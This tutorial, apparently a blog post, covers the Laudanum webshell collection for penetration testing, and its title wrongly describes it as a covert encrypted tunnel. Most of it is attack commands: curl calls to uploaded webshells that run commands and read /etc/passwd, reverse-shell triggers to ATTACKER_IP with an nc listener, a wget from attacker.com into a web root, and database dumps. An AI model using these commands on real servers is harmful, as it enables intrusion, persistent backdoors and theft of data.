laudanum: A covert channel tool for encrypting and tunneling data over a network

Laudanum is a collection of injectable files designed for penetration testers and security researchers to aid in web application testing. It is included in Kali Linux and provides various scripts (PHP, ASP, JSP, etc.) that can be uploaded to a compromised web server to assist in post-exploitation activities.

What is Laudanum?

Laudanum is a pre-packaged set of webshells and utilities used for:

• Command execution (via web interfaces)
• File upload/download
• Database interaction
• Port scanning
• Reverse shell establishment

It is often used in penetration testing when an attacker gains file upload capabilities on a web server.

How Laudanum Works

Laudanum provides server-side scripts that, when uploaded to a vulnerable web server, allow an attacker to:

• Execute system commands
• Browse the filesystem
• Perform network reconnaissance
• Interact with databases
• Set up reverse shells

The scripts are written in multiple languages (PHP, ASP, JSP, CFM) to work across different server environments.

Installation in Kali Linux

Laudanum is pre-installed in Kali Linux. You can find it at:

/usr/share/laudanum

If it’s not present, install it via:

sudo apt update && sudo apt install laudanum

Basic Usage

Uploading a Laudanum Script

1. Identify a file upload vulnerability (e.g., in a web form).
2. Upload a relevant script (e.g., cmd.php for PHP servers).
3. Access the script via the browser or curl.

Example: Simple Command Execution

• Upload cmd.php to the target server.
• Access it via:

curl http://target.com/uploads/cmd.php?cmd=id

Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Advanced Usage

Reverse Shell Setup

1. Use shell.php (PHP reverse shell):

   # On attacker machine:
   nc -lvnp 4444

   # Trigger reverse shell via browser or curl:
   curl "http://target.com/uploads/shell.php?ip=ATTACKER_IP&port=4444"

Database Interaction

• Use mssql.php for MSSQL queries:

curl "http://target.com/uploads/mssql.php?server=localhost&query=SELECT+*+FROM+users"

Port Scanning

• Use portscan.php:

curl "http://target.com/uploads/portscan.php?host=192.168.1.1&port=80,22,443"

Command-Line Options

Laudanum scripts are typically controlled via HTTP GET/POST parameters:

• cmd.php: ?cmd=whoami
• shell.php: ?ip=ATTACKER_IP&port=4444
• upload.php: ?file=/path/to/local/file&destination=/remote/path

Laudanum Directory Structure Overview

1. /usr/share/laudanum/asp

• Purpose: Active Server Pages (ASP) scripts for Windows-based servers.
• Key Files:
• cmd.asp (Execute OS commands)
• shell.asp (Reverse shell)
• upload.asp (File upload)
• Example Usage:

curl "http://target.com/uploads/cmd.asp?cmd=whoami"

2. /usr/share/laudanum/aspx

• Purpose: ASP.NET scripts for modern Windows servers.
• Key Files:
• cmd.aspx (Command execution)
• dns.aspx (DNS lookup)
• Example Usage:

curl "http://target.com/uploads/cmd.aspx?cmd=ipconfig"

3. /usr/share/laudanum/cfm

• Purpose: ColdFusion Markup Language scripts (rare but still used in legacy systems).
• Key Files:
• cmd.cfm (Command execution)
• Example Usage:

curl "http://target.com/uploads/cmd.cfm?cmd=netstat -an"

4. /usr/share/laudanum/jsp

• Purpose: Java Server Pages scripts for Tomcat/JBoss environments.
• Key Files:
• cmd.jsp (Command execution)
• shell.jsp (Reverse shell)
• Example Usage:

curl "http://target.com/uploads/cmd.jsp?cmd=uname -a"

5. /usr/share/laudanum/php

• Purpose: PHP scripts (most widely used).
• Key Files:
• cmd.php (Execute commands)
• shell.php (Reverse shell)
• upload.php (File upload)
• portscan.php (Network scanning)
• mysql.php (MySQL interaction)
• Example Usage:

  # Command execution:
  curl "http://target.com/uploads/cmd.php?cmd=id"

  # Reverse shell (attacker listens on 4444):
  curl "http://target.com/uploads/shell.php?ip=ATTACKER_IP&port=4444"

6. /usr/share/laudanum/wordpress

• Purpose: WordPress-specific backdoors (if WP is compromised).
• Key Files:
• wp-shell.php (Standalone PHP shell disguised as a WP file)
• Example Usage:

curl "http://target.com/wp-content/uploads/wp-shell.php?cmd=ls"

7. /usr/share/laudanum/helpers

• Purpose: Miscellaneous utilities (e.g., wget-based downloaders).
• Key Files:
• wget.sh (Download files via wget)
• Example Usage:

  # On the target (if shell access is available):
  wget http://attacker.com/laudanum/cmd.php -O /var/www/html/uploads/cmd.php

Practical Use Cases

1. Post-Exploitation Command Execution

• After uploading cmd.php:

curl "http://target.com/uploads/cmd.php?cmd=cat+/etc/passwd"

2. Reverse Shell Setup

• Attacker sets up listener:

nc -lvnp 4444

• Victim executes (via shell.php):

curl "http://target.com/uploads/shell.php?ip=10.0.0.1&port=4444"

3. Internal Network Scanning

• Using portscan.php:

curl "http://target.com/uploads/portscan.php?host=192.168.1.1&port=22,80,443"

4. Database Dumping (MySQL)

• Using mysql.php:

curl "http://target.com/uploads/mysql.php?host=localhost&user=root&pass=password&query=SELECT+*+FROM+users"

Real-World Use Cases

1. Post-Exploitation: After exploiting a file upload vulnerability, upload Laudanum to maintain access.
2. Internal Network Recon: Use portscan.php to map internal networks.
3. Database Dumping: Extract database credentials using mssql.php or mysql.php.
4. Privilege Escalation: Execute commands to exploit misconfigurations.

Troubleshooting Tips